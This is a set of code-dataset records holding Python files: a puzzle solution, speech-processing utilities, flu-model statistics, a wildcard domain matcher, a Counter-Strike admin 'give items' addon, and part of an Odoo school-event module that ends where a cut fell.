+{"seq_id":"548065420","text":"import re\n\nnum_test = int(input())\nnum_list = []\nfor i in range(num_test):\n num = int(input())\n num_list.append(num)\nfor i in range(num_test):\n num = num_list[i]\n limit = 0\n j = 2\n while True:\n if pow(2, j) - 2 >= num:\n limit = j\n break\n j = j + 1\n bitNum = limit - 1\n length = int(pow(2, bitNum))\n order = num - int(pow(2, bitNum)) + 2\n valid_list = []\n while length > 1:\n if order % length == 0 or order % length > int(length / 2):\n valid_list.append('7')\n length = int(length / 2)\n else:\n valid_list.append('4')\n length = int(length / 2)\n res = ''.join(valid_list)\n print(res)","sub_path":"Code/CodeRecords/2185/60870/278625.py","file_name":"278625.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"309568559","text":"import torch\nimport os\nfrom model import xvecTDNN\nimport random\nimport numpy as np\nimport librosa\nimport webrtcvad\nimport sys\nimport collections\nimport contextlib\nimport wave\n\n\ndef load_data(hparams):\n f = open(hparams.train_data_txt_dir, 'r')\n mel_list = []\n language_id = []\n time = []\n while True:\n line = f.readline()\n if line != '':\n mel_list.append(line.split(' ')[0])\n language_id.append(line.split(' ')[1])\n time.append(line.split(' ')[2])\n else:\n break\n size = len(mel_list)\n index = [i for i in range(size)]\n random.shuffle(index)\n mel_list = np.array(mel_list)[index]\n language_id = np.array(language_id)[index]\n time = np.array(time)[index]\n return [mel_list[:int(size * 0.9)], language_id[:int(size * 0.9)], time[:int(size * 0.9)]],\\\n [mel_list[int(size * 0.9):], language_id[int(size * 0.9):], time[int(size * 0.9):]]\n\n\ndef load_recent_model(model_path):\n \"\"\"\n 返回最近的权重文件\n :param path:\n :return:\n \"\"\"\n model_list = os.listdir(model_path)\n recent_epoch = -1\n recent_file = None\n for model_file in model_list:\n epoch = int(((model_file.split('_')[-1]).split('-')[0])[1:])\n if epoch > recent_epoch:\n recent_epoch = epoch\n recent_file = model_file\n print('recent file', recent_file)\n if recent_file is None:\n return None\n else:\n return os.path.join(model_path, recent_file), recent_epoch\n\n\ndef load_best_model(model_path, hparams):\n \"\"\"\n 返回acc最好的权重文件\n :param path:\n :return:\n \"\"\"\n model_list = os.listdir(model_path)\n best_acc = 0\n best_file = None\n for model_file in model_list:\n model_acc = float((model_file.split('-')[-1])[:-3])\n if hparams.load_epoch is not None:\n epoch = int(((model_file.split('_')[-1]).split('-')[0])[1:])\n if epoch != hparams.load_epoch:\n continue\n if model_acc > best_acc:\n best_acc = model_acc\n best_file = model_file\n print('best_file', best_file)\n return os.path.join(model_path, best_file)\n\n\ndef create_model(hparams, mode='train'):\n if hparams.model == 'xvecTDNN':\n mymodel = xvecTDNN(hparams)\n else:\n raise ValueError('model not exist!')\n\n if mode == 'train':\n if load_recent_model(hparams.model_save_path) is not None:\n model_path, recent_epoch = load_recent_model(hparams.model_save_path)\n checkpoint = torch.load(model_path)\n if hparams.model == 'xvecTDNN':\n mymodel.load_state_dict(checkpoint['model_state'])\n return mymodel, recent_epoch\n else:\n return mymodel, 0\n else:\n best_file_path = load_best_model(hparams.model_save_path, hparams)\n checkpoint = torch.load(best_file_path)\n if hparams.model == 'xvecTDNN':\n mymodel.load_state_dict(checkpoint['model_state'])\n return mymodel\n\n\ndef get_predict_file_list(predict_path):\n if os.path.isfile(predict_path):\n return [predict_path]\n else:\n result = []\n predict_folder = os.listdir(predict_path)\n predict_folder.sort()\n for predict_file in predict_folder:\n result.append(os.path.join(predict_path, predict_file))\n return result\n\n\ndef feature_extract(wav_path, mode='mel_spectrum'):\n if mode == 'mel_spectrum':\n pass\n else:\n raise ValueError('Unlegal feature extracting method!')\n\n\ndef get_melspectrum(hparams, wav_path):\n try:\n y, sr = librosa.load(wav_path)\n except Exception:\n print('Error open', wav_path)\n return None\n else:\n mel = librosa.feature.melspectrogram(y=y, sr=sr, n_mels=hparams.n_mels,\n n_fft=hparams.mel_frame_length,\n hop_length=hparams.mel_frame_shift)\n logmel = librosa.power_to_db(mel ** 2)\n # 这里可以看一下时长,如果平均时长比较长 可以采用这种方法 否则最好全局normalize\n return librosa.util.normalize(logmel, axis=1)\n\n\nclass Frame(object):\n \"\"\"Represents a \"frame\" of audio data.\"\"\"\n def __init__(self, bytes, timestamp, duration):\n self.bytes = bytes\n self.timestamp = timestamp\n self.duration = duration\n\n\nclass VadSplit:\n def __init__(self, hparams, wav_path, output_path):\n self.vad_mode = hparams.vad_mode\n self.frame_length = hparams.vad_frame_dur\n self.buffer_length = hparams.vad_buffer_length\n self.wav_path = wav_path\n self.output_path = output_path\n self.audio, self.sample_rate = self.read_wave()\n\n def read_wave(self):\n try:\n with contextlib.closing(wave.open(self.wav_path, 'rb')) as wf:\n num_channels = wf.getnchannels()\n assert num_channels == 1\n sample_width = wf.getsampwidth()\n assert sample_width == 2\n sample_rate = wf.getframerate()\n assert sample_rate in (8000, 16000, 32000, 48000)\n pcm_data = wf.readframes(wf.getnframes())\n return pcm_data, sample_rate\n except Exception:\n print('Error open', self.wav_path)\n return None, None\n\n def write_wave(self, path, audio):\n with contextlib.closing(wave.open(path, 'wb')) as wf:\n wf.setnchannels(1)\n wf.setsampwidth(2)\n wf.setframerate(self.sample_rate)\n wf.writeframes(audio)\n\n def frame_generator(self):\n \"\"\"Generates audio frames from PCM audio data.\n Takes the desired frame duration in milliseconds, the PCM data, and\n the sample rate.\n Yields Frames of the requested duration.\n \"\"\"\n # 因为wave库是以byte方式读入数据,而给定音频是每个数据是16-bit,也就是一个数据就要占2byte\n # 因此需要乘2来获取对应时长的数据\n n = int(self.sample_rate * (self.frame_length / 1000.0) * 2)\n offset = 0\n timestamp = 0.0\n duration = (float(n) / self.sample_rate) / 2.0\n while offset + n < len(self.audio):\n yield Frame(self.audio[offset:offset + n], timestamp, duration)\n timestamp += duration\n offset += n\n\n def vad_collector(self, vad, frames):\n num_padding_frames = self.buffer_length\n ring_buffer = collections.deque(maxlen=num_padding_frames)\n triggered = False\n\n voiced_frames = []\n for frame in frames:\n is_speech = vad.is_speech(frame.bytes, self.sample_rate)\n\n # sys.stdout.write('1' if is_speech else '0')\n if not triggered:\n ring_buffer.append((frame, is_speech))\n num_voiced = len([f for f, speech in ring_buffer if speech])\n # If we're NOTTRIGGERED and more than 90% of the frames in\n # the ring buffer are voiced frames, then enter the\n # TRIGGERED state.\n if num_voiced > 0.9 * ring_buffer.maxlen:\n triggered = True\n # sys.stdout.write('+(%s)' % (ring_buffer[0][0].timestamp,))\n # We want to yield all the audio we see from now until\n # we are NOTTRIGGERED, but we have to start with the\n # audio that's already in the ring buffer.\n for f, s in ring_buffer:\n voiced_frames.append(f)\n ring_buffer.clear()\n else:\n # We're in the TRIGGERED state, so collect the audio data\n # and add it to the ring buffer.\n voiced_frames.append(frame)\n ring_buffer.append((frame, is_speech))\n num_unvoiced = len([f for f, speech in ring_buffer if not speech])\n # If more than 90% of the frames in the ring buffer are\n # unvoiced, then enter NOTTRIGGERED and yield whatever\n # audio we've collected.\n if num_unvoiced > 0.9 * ring_buffer.maxlen:\n # sys.stdout.write('-(%s)' % (frame.timestamp + frame.duration))\n triggered = False\n yield b''.join([f.bytes for f in voiced_frames])\n ring_buffer.clear()\n voiced_frames = []\n # if triggered:\n # sys.stdout.write('-(%s)' % (frame.timestamp + frame.duration))\n # sys.stdout.write('\\n')\n # If we have any leftover voiced audio when we run out of input,\n # yield it.\n if voiced_frames:\n yield b''.join([f.bytes for f in voiced_frames])\n\n def output_segment(self):\n if self.audio is None:\n return\n vad = webrtcvad.Vad(self.vad_mode)\n frames = self.frame_generator()\n frames = list(frames)\n segments = self.vad_collector(vad, frames)\n wav_name = os.path.basename(self.wav_path).split('.')[0]\n output_base_name = os.path.join(self.output_path, wav_name)\n for i, segment in enumerate(segments):\n path = output_base_name + '-%d.wav' % (i,)\n self.write_wave(path, segment)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"5061016","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Script which can be used to compare the features obtained of two different influenza models\n\nUsage:\n get_model_statistics.py [--country=] [--no-future] [--basedir=] [--start-year=] [--end-year=] [--save] [--no-graph]\n\n Data file of the first model\n Data file of the second model\n -h, --help Print this help message\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nfrom docopt import docopt\nimport os\nimport glob\n\nfrom sklearn.metrics import mean_squared_error\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set()\n\ndef get_results_filename(basepath):\n files = [f for f in glob.glob(basepath + \"/*-prediction.csv\", recursive=True)]\n y = os.path.basename(files[0]).split(\"-\")[0]\n y2 = os.path.basename(files[0]).split(\"-\")[1]\n return \"{}-{}\".format(y, y2)\n\nif __name__ == \"__main__\":\n\n args = docopt(__doc__)\n\n model = args[\"\"]\n base_dir = args[\"--basedir\"] if args[\"--basedir\"] else \"../complete_results\"\n country = args[\"--country\"] if args[\"--country\"] else \"italy\"\n future = \"no-future\" if args[\"--no-future\"] else \"future\"\n\n # Read the baseline results and merge them\n model_path = os.path.join(base_dir, args[\"\"], future, country)\n season_years = get_results_filename(model_path)\n model_file = os.path.join(model_path, \"{}-prediction.csv\".format(season_years))\n\n # Load the data\n data = pd.read_csv(model_file)\n\n # Get only the weeks we care for\n start_year = \"2007-42\" if not args[\"--start-year\"] else args[\"--start-year\"]\n end_year = \"2019-15\" if not args[\"--end-year\"] else args[\"--end-year\"]\n\n start_season = data[\"week\"] >= start_year\n end_season = data[\"week\"] <= str(int(end_year.split(\"-\")[0]) + 1) + \"-\" + end_year.split(\"-\")[1]\n total = start_season & end_season\n\n data = data[total]\n\n # Describe the data\n print(\"\")\n print(\"[*] Describe the given dataset {}\".format(model_file))\n print(data.describe())\n\n # Generate residuals\n print(\"\")\n print(\"[*] Describe the residuals\")\n residuals = data[\"incidence\"]-data[\"prediction\"]\n print(residuals.describe())\n\n # Get some statistics\n print(\"\")\n total_pearson = 0\n for i in np.arange(0, len(data[\"prediction\"]), 26):\n total_pearson += stats.pearsonr(data[\"prediction\"][i:i+26], data[\"incidence\"][i:i+26])[0]\n print(\"Pearson Correlation (value/p): \", total_pearson/(len(data[\"prediction\"])/26))\n print(\"\")\n\n print(\"Mean Squared Error: \", mean_squared_error(data[\"prediction\"], data[\"incidence\"]))\n print(\"\")\n\n if not args[\"--no-graph\"]:\n ax = sns.distplot(residuals, label=\"Residual\")\n plt.figure()\n ax = sns.distplot(data[\"incidence\"], label=\"Incidence\")\n ax = sns.distplot(data[\"prediction\"], label=\"Prediction\")\n plt.legend()\n plt.show()\n","sub_path":"data_analysis/get_model_statistics.py","file_name":"get_model_statistics.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"194282833","text":"#!/usr/bin/env python3\n\nrr1 = \"*.bbb.cc.d\"\nrr2 = \"aaaa.bbb.cc\"\nrr3 = \"*cc.d\"\nhmap = {rr1 : rr1, rr2 : rr2, rr3 : rr3 }\nr = \"q.w.e.r.t.y.bbb.cc.d\"\n\ndef wild_card_match(hash_map, rec):\n \n if (rec in hash_map):\n print(\"Found match!\")\n return \n\n sub_domains = rec.split(\".\")\n # For each subdomain in RR -> O(n), n = subdomain levels\n for i in sub_domains:\n s = \".\".join(sub_domains[1:])\n print(\"*\"+s)\n sub_domains = s.split(\".\") \n\n # Python dict is a hash map, hash map search is O(1)\n if \"*\"+s in hash_map or s in hash_map:\n print(\"Found match!\")\n return\n\n sub_domains = rec.split(\".\")\n # Do the same but from the tail. -> O(2*n)\n for i in sub_domains:\n s = \".\".join(sub_domains[:-1])\n print(s+\"*\")\n sub_domains = s.split(\".\") \n \n # Python dict is a hash map, hash map search is O(1)\n if s+\"*\" in hash_map:\n print(\"Found match!\")\n return\n \n print(\"No match for the input record.\")\n\n\nwild_card_match(hmap, r)\n","sub_path":"wildcard_match.py","file_name":"wildcard_match.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"562868170","text":"import es\nimport gamethread\nimport popuplib\nimport playerlib\n\nfrom xa import xa\n\nimport psyco\npsyco.full()\n\ninfo = es.AddonInfo()\ninfo.name = 'Admin Give'\ninfo.version = '1.0.4'\ninfo.basename = 'xaadmingive'\n\nxaadmingive \t\t\t = xa.register('xaadmingive')\nxalanguage \t\t\t = xaadmingive.language.getLanguage()\nadmingive_anonymous = xaadmingive.setting.createVariable('admingive_anonymous' , 0, 'Whether or not giving a player a weapon is anonymous... 1 = Anonymous, 0 = Global')\nadmingive_stripfirst = xaadmingive.setting.createVariable(\"admingive_stripfirst\", 1, 'Whether or not the target is striped of their weapon before being gave another.\\n // Will only strip the same slot as their being given.')\n\npistols = ('usp','glock','p228','deagle','elite','fiveseven')\nshotguns = ('m3','xm1014')\nsmgs = ('tmp','mac10','mp5navy','ump45','p90')\nrifles = ('famas','galil','ak47','m4a1','sg552','aug')\nsnipers = ('scout','sg550','g3sg1','awp')\ngrenades = ('hegrenade','smokegrenade','flashbang')\nitems = ('vest','vesthelm','nvgs','c4','defuser')\nadmins = {}\ngamename = str(es.ServerVar('eventscripts_gamedir')).replace('\\\\', '/').split('/')[~0]\n\n####################\n# EVENTS\ndef player_disconnect(ev):\n if admins.has_key(int(ev['userid'])):\n del admins[int(ev['userid'])]\n####################\n\ndef load():\n admingivemenu = popuplib.easymenu(\"admingive\", \"_tempcore\", _select_give)\n admingivemenu.settitle(xalanguage[\"give object\"])\n xaadmingive.addMenu(\"admingive\", xalanguage[\"give\"], \"admingive\", \"give\", \"ADMIN\")\n admingivemenu.addoption(1, xalanguage[\"give weapon\"])\n admingivemenu.addoption(2, xalanguage[\"give item\"])\n admingivemenu.addoption(3, xalanguage[\"give health\"])\n if gamename == 'cstrike': \n admingivemenu.addoption(4, xalanguage[\"give cash\"])\n \n giveweapon = popuplib.easymenu(\"admingiveweapon\", '_tempcore', _select_weapon_type)\n giveweapon.settitle(xalanguage[\"select weapon type\"])\n giveweapon.addoption(1, xalanguage[\"pistols\"])\n giveweapon.addoption(2, xalanguage[\"shotguns\"])\n giveweapon.addoption(3, xalanguage[\"smgs\"])\n giveweapon.addoption(4, xalanguage[\"rifles\"])\n giveweapon.addoption(5, xalanguage[\"snipers\"])\n giveweapon.addoption(6, xalanguage[\"machinegun\"])\n giveweapon.addoption(7, xalanguage[\"grenades\"])\n giveweapon.submenu(10, \"admingive\")\n \n pistolsmenu = popuplib.easymenu(\"admingivepistols\", '_tempcore', _give)\n for weapon in pistols:\n pistolsmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n pistolsmenu.submenu(10, \"admingiveweapon\")\n pistolsmenu.settitle(xalanguage[\"pistols\"])\n \n shotgunsmenu = popuplib.easymenu(\"admingiveshotguns\", '_tempcore', _give)\n for weapon in shotguns:\n shotgunsmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n shotgunsmenu.submenu(10, \"admingiveweapon\")\n shotgunsmenu.settitle(xalanguage[\"shotguns\"])\n \n smgsmenu = popuplib.easymenu(\"admingivesmgs\", '_tempcore', _give)\n for weapon in smgs:\n smgsmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n smgsmenu.submenu(10, \"admingiveweapon\")\n smgsmenu.settitle(xalanguage[\"smgs\"])\n \n riflesmenu = popuplib.easymenu(\"admingiverifles\", '_tempcore', _give)\n for weapon in rifles:\n riflesmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n riflesmenu.submenu(10, \"admingiveweapon\")\n riflesmenu.settitle(xalanguage[\"rifles\"])\n \n snipersmenu = popuplib.easymenu(\"admingivesnipers\", '_tempcore', _give)\n for weapon in snipers:\n snipersmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n snipersmenu.submenu(10, \"admingiveweapon\")\n snipersmenu.settitle(xalanguage[\"snipers\"])\n \n machine = popuplib.easymenu(\"admingivemachinegun\", '_tempcore', _give)\n machine.addoption('weapon_m249', xalanguage['m249'])\n machine.submenu(10, \"admingiveweapon\")\n machine.settitle(xalanguage[\"machinegun\"])\n \n greandesmenu = popuplib.easymenu(\"admingivegrenades\", '_tempcore', _give)\n for weapon in grenades:\n greandesmenu.addoption('weapon_' + weapon, xalanguage[weapon])\n greandesmenu.submenu(10, \"admingiveweapon\")\n greandesmenu.settitle(xalanguage[\"grenades\"])\n \n giveitem = popuplib.easymenu(\"admingiveitem\", '_tempcore', _give)\n for item in items:\n if item == 'c4':\n giveitem.addoption('weapon_' + item, xalanguage[item])\n else:\n if 'vest' in item and gamename == 'cstrike':\n giveitem.addoption('item_' + item, xalanguage[item])\n elif 'vest' not in item:\n giveitem.addoption('item_' + item, xalanguage[item])\n giveitem.submenu(10, \"admingive\")\n giveitem.settitle(xalanguage[\"select item\"])\n \n targetmenu = popuplib.easymenu(\"targetmenu\", \"_tempcore\", _select_target)\n targetmenu.settitle(xalanguage[\"choose target\"])\n targetmenu.addoption(\"player\", xalanguage[\"select a player\"])\n targetmenu.addoption(\"bots\", xalanguage[\"bots\"])\n targetmenu.addoption(\"team3\", xalanguage[\"counter terrorists\"])\n targetmenu.addoption(\"team2\", xalanguage[\"terrorists\"])\n targetmenu.addoption(\"all\", xalanguage[\"all players\"])\n \n cash = popuplib.easymenu(\"admingivecash\", \"_tempcore\", _select_cash_amount)\n for b in ('10','100','500','1000','2000','4000','8000','16000'):\n d = b\n c = ''\n while len(b) > 3:\n c = ',' + b[-3:]\n b = b[0:-3]\n c = '$' + b + c\n cash.addoption(int(d), c)\n cash.settitle(xalanguage[\"give cash\"])\n cash.submenu(10, 'admingive')\n \n health = popuplib.easymenu(\"admingivehealth\", \"_tempcore\", _select_health_amount)\n for b in ('1','5','10','50','100','1000','10000','100000'):\n d = b\n c = ''\n while len(b) > 3:\n c = ',' + b[-3:]\n b = b[0:-3]\n c = b + c\n health.addoption(int(d), c)\n health.settitle(xalanguage[\"give health\"])\n health.submenu(10, 'admingive')\n \ndef unload():\n for popup in ['pistols','shotguns','smgs','rifles','snipers','machinegun','grenades','item','health','cash','']:\n if popuplib.exists('admingive' + popup):\n popuplib.close('admingive' + popup, es.getUseridList())\n popuplib.delete('admingive' + popup)\n for popup in ['targetmenu','giveplayermenu']:\n if popuplib.exists(popup):\n popuplib.close(popup, es.getUseridList())\n popuplib.delete(popup)\n xaadmingive.unregister()\n \ndef _select_target(userid, choice, popupid):\n if not admins.has_key(userid):\n return\n if choice == \"player\":\n giveplayermenu = popuplib.construct(\"giveplayermenu\", \"players\", \"#alive\")\n giveplayermenu.settitle(xalanguage[\"choose player\"])\n giveplayermenu.menuselectfb = _select_player\n giveplayermenu.send(userid)\n else:\n if choice == \"team3\":\n playerlist = filter(lambda x: es.getplayerteam(x) == 3, es.getUseridList())\n elif choice == \"team2\":\n playerlist = filter(lambda x: es.getplayerteam(x) == 2, es.getUseridList())\n elif choice == \"bots\":\n playerlist = filter(lambda x: es.isbot(x), es.getUseridList())\n elif choice == \"all\":\n playerlist = es.getUseridList()\n playerlist = filter(lambda x: not es.getplayerprop(x, 'CBasePlayer.pl.deadflag'), playerlist)\n for player in playerlist:\n command = admins[userid]['command']\n if command.startswith('weapon_') or command.startswith('item_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(player)\n for myplayer in playerlib.getPlayerList('#human'):\n tokens['item'] = '#greena #lightgreen' + str(xalanguage(command.replace('weapon_','').replace('item_',''), lang=myplayer.get(\"lang\")))\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n if 'vest' not in command:\n if str(admingive_stripfirst) == '1':\n if command.replace('weapon_','') in pistols:\n secondary = playerlib.getPlayer(player).get('secondary') \n if secondary:\n RemoveWeapon(player, secondary)\n elif command.replace('weapon_','') in (list(shotguns) + list(smgs) + list(rifles) + list(snipers) + ['m249']):\n primary = playerlib.getPlayer(player).get('primary') \n if primary:\n RemoveWeapon(player, primary)\n gamethread.delayed(0.1, es.server.queuecmd, 'es_xgive %s %s'%(player, command))\n else:\n if 'helm' in command:\n es.setplayerprop(player, 'CCSPlayer.m_bHasHelmet', 1)\n es.setplayerprop(player, 'CCSPlayer.m_ArmorValue', 100)\n elif command.startswith('health_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(player)\n health = command.replace('health_','')\n c = ''\n while len(health) > 3:\n c = ',' + health[-3:]\n health = health[0:-3]\n c = health + c\n tokens['item'] = '#green' + c + ' #lightgreenhealth'\n for myplayer in playerlib.getPlayerList('#human'):\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n es.setplayerprop(player, 'CBasePlayer.m_iHealth', es.getplayerprop(player, 'CBasePlayer.m_iHealth') + int(command.replace('health_','')))\n elif command.startswith('cash_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(player)\n cash = command.replace('cash_','')\n c = ''\n while len(cash) > 3:\n c = ',' + cash[-3:]\n cash = cash[0:-3]\n c = '$' + cash + c\n tokens['item'] = '#green' + c\n for myplayer in playerlib.getPlayerList('#human'):\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n es.setplayerprop(player, 'CCSPlayer.m_iAccount', es.getplayerprop(player, 'CCSPlayer.m_iAccount') + int(command.replace('cash_','')))\n\ndef _select_player(userid, choice, popupid):\n command = admins[userid]['command']\n if command.startswith('weapon_') or command.startswith('item_'):\n if 'vest' not in command:\n if str(admingive_stripfirst) == '1':\n if command.replace('weapon_','') in pistols:\n secondary = playerlib.getPlayer(choice).get('secondary') \n if secondary:\n RemoveWeapon(choice, secondary)\n elif command.replace('weapon_','') in (list(shotguns) + list(smgs) + list(rifles) + list(snipers) + ['m249']):\n primary = playerlib.getPlayer(choice).get('primary') \n if primary:\n RemoveWeapon(choice, primary)\n gamethread.delayed(0.1, es.server.queuecmd, 'es_xgive %s %s'%(choice, command))\n else:\n if 'helm' in command:\n es.setplayerprop(choice, 'CCSPlayer.m_bHasHelmet', 1)\n es.setplayerprop(choice, 'CCSPlayer.m_ArmorValue', 100)\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(choice)\n for myplayer in playerlib.getPlayerList('#human'):\n tokens['item'] = '#greena #lightgreen' + str(xalanguage(command.replace('weapon_','').replace('item_',''), lang=myplayer.get(\"lang\")))\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n elif command.startswith('health_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(choice)\n health = command.replace('health_','')\n c = ''\n while len(health) > 3:\n c = ',' + health[-3:]\n health = health[0:-3]\n c = health + c\n tokens['item'] = '#green' + c + ' #lightgreenhealth'\n for myplayer in playerlib.getPlayerList('#human'):\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n es.setplayerprop(choice, 'CBasePlayer.m_iHealth', es.getplayerprop(choice, 'CBasePlayer.m_iHealth') + int(command.replace('health_','')))\n elif command.startswith('cash_'):\n if str(admingive_anonymous) == '0':\n tokens = {}\n tokens['admin'] = es.getplayername(userid)\n tokens['user'] = es.getplayername(choice)\n cash = command.replace('cash_','')\n c = ''\n while len(cash) > 3:\n c = ',' + cash[-3:]\n cash = cash[0:-3]\n c = '$' + cash + c\n tokens['item'] = '#green' + c\n for myplayer in playerlib.getPlayerList('#human'):\n es.tell(int(myplayer), '#multi', xalanguage('admin give', tokens, myplayer.get(\"lang\")))\n es.setplayerprop(choice, 'CCSPlayer.m_iAccount', es.getplayerprop(choice, 'CCSPlayer.m_iAccount') + int(command.replace('cash_','')))\n \ndef _select_cash_amount(userid, choice, popupid):\n if not admins.has_key(userid):\n admins[userid] = {}\n admins[userid]['command'] = 'cash_%s'%choice\n popuplib.send('targetmenu', userid)\n \ndef _select_health_amount(userid, choice, popupid):\n if not admins.has_key(userid):\n admins[userid] = {}\n admins[userid]['command'] = 'health_%s'%choice\n popuplib.send('targetmenu', userid)\n \ndef _select_give(userid, choice, popupid):\n if choice == 1:\n popuplib.send('admingiveweapon', userid)\n elif choice == 2:\n popuplib.send('admingiveitem', userid)\n elif choice == 3:\n popuplib.send('admingivehealth', userid)\n elif choice == 4:\n popuplib.send('admingivecash', userid)\n \ndef _select_weapon_type(userid, choice, popupid):\n if choice == 1:\n popuplib.send(\"admingivepistols\", userid)\n elif choice == 2:\n popuplib.send(\"admingiveshotguns\", userid)\n elif choice == 3:\n popuplib.send(\"admingivesmgs\", userid)\n elif choice == 4:\n popuplib.send(\"admingiverifles\", userid)\n elif choice == 5:\n popuplib.send(\"admingivesnipers\", userid)\n elif choice == 6:\n popuplib.send(\"admingivemachinegun\", userid)\n elif choice == 7:\n popuplib.send(\"admingivegrenades\", userid)\n \ndef _give(userid, choice, popupid):\n if not admins.has_key(userid):\n admins[userid] = {}\n admins[userid]['command'] = choice\n popuplib.send('targetmenu', userid)\n\ndef RemoveWeapon(userid, weapon):\n handle = es.getplayerhandle(userid)\n if not weapon.startswith('weapon_'):\n weapon = \"weapon_\" + weapon\n for index in es.createentitylist(weapon):\n if es.getindexprop(index, 'CBaseEntity.m_hOwnerEntity') == handle:\n es.server.cmd('es_xremove %s' % index)\n break","sub_path":"mattie_eventscripts/cssource_legacy/mattie_eventscripts_200beta2_250i/addons/eventscripts/xa/modules/xaadmingive/xaadmingive.py","file_name":"xaadmingive.py","file_ext":"py","file_size_in_byte":15840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"291418822","text":"# -*- coding: utf-8 -*-\n# See LICENSE file for full copyright and licensing details.\n\nimport time\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import Warning as UserError\n\n\nclass BoardBoard(models.AbstractModel):\n _inherit = \"board.board\"\n\n\nclass SchoolStandard(models.Model):\n _name = 'school.standard'\n _inherit = 'school.standard'\n _rec_name = 'event_ids'\n\n event_ids = fields.Many2many('school.event', 'school_standard_event_rel',\n 'event_id', 'standard_id', 'Events',\n readonly=True)\n\n\nclass SchoolEventParameter(models.Model):\n '''for event parameter based on which score will given'''\n _name = 'school.event.parameter'\n _description = 'Event Parameter'\n\n name = fields.Char('Parameter Name', required=True)\n\n\nclass SchoolEventParticipant(models.Model):\n '''for Participant which are participated in events'''\n _name = 'school.event.participant'\n _description = 'Participant Information'\n _order = \"sequence\"\n\n name = fields.Many2one('student.student', 'Participant Name',\n readonly=True)\n score = fields.Float('Score', default=0)\n event_id = fields.Many2one('school.event', 'Event', readonly=True)\n stu_pid = fields.Char('Personal Identification Number', required=True,\n readonly=True)\n win_parameter_id = fields.Many2one('school.event.parameter', 'Parameter',\n readonly=True)\n sequence = fields.Integer('Rank', help=\"The sequence field is used to Give\\\n Rank to the Participant\", default=0)\n\n\nclass SchoolEvent(models.Model):\n '''for events'''\n _name = 'school.event'\n _description = 'Event Information'\n _rec_name = 'name'\n\n @api.multi\n @api.depends('part_ids')\n def _compute_participants(self):\n for rec in self:\n rec.participants = len(rec.part_ids)\n\n name = fields.Char('Event Name', help=\"Full Name of the event\")\n event_type = fields.Selection([('intra', 'IntraSchool'),\n ('inter', 'InterSchool')],\n 'Event Type',\n help='Event is either IntraSchool\\\n or InterSchool')\n start_date = fields.Date('Start Date', help=\"Event Starting Date\")\n end_date = fields.Date('End Date', help=\"Event Ending Date\")\n start_reg_date = fields.Date('Start Registration Date',\n help=\"Event registration starting date\")\n last_reg_date = fields.Date('Last Registration Date',\n help=\"Last Date of registration\")\n contact_per_id = fields.Many2one('hr.employee', 'Contact Person',\n help=\"Event contact person\")\n supervisor_id = fields.Many2one('hr.employee', 'Supervisor',\n help=\"Event Supervisor Name\")\n parameter_id = fields.Many2one('school.event.parameter', 'Parameter',\n help=\"Parameters of the Event\\\n like (Goal, Point)\")\n maximum_participants = fields.Integer('Maximum Participants',\n help='Maximum Participant\\\n of the Event')\n participants = fields.Integer(compute='_compute_participants',\n string='Participants', readonly=True)\n part_standard_ids = fields.Many2many('school.standard',\n 'school_standard_event_rel',\n 'standard_id', 'event_id',\n 'Participant Standards',\n help=\"The Participant is from\\\n which standard\")\n state = fields.Selection([('draft', 'Draft'), ('open', 'Running'),\n ('close', 'Close'), ('cancel', 'Cancel')],\n string='State', readonly=True, default='draft')\n part_ids = fields.Many2many('school.event.participant',\n 'event_participants_rel', 'participant_id',\n 'event_id', 'Participants', readonly=True,\n order_by='score')\n code = fields.Many2one('school.school', 'Organizer School',\n help='Event Organized School')\n is_holiday = fields.Boolean('Is Holiday(s)',\n help='Checked if the event is organized\\\n on holiday.')\n color = fields.Integer('Color Index', default=0)\n\n @api.constrains('start_date', 'end_date')\n def _check_dates(self):\n\n sedt = self.start_date > self.end_date\n if (self.start_date and self.end_date and sedt):\n raise UserError(_('Error! Event start-date must be lower\\\n then Event end-date.'))\n\n @api.constrains('start_date', 'end_date', 'start_reg_date',\n 'last_reg_date')\n def _check_all_dates(self):\n\n dt = self.start_reg_date and self.last_reg_date\n if (self.start_date and self.end_date and dt):\n\n if self.start_reg_date > self.last_reg_date:\n raise UserError(_('Error! Event Registration StartDate must be\\\n lower than Event Registration end-date.'))\n elif self.last_reg_date >= self.start_date:\n raise UserError(_('Error! Event Registration last-date must be\\\n lower than Event 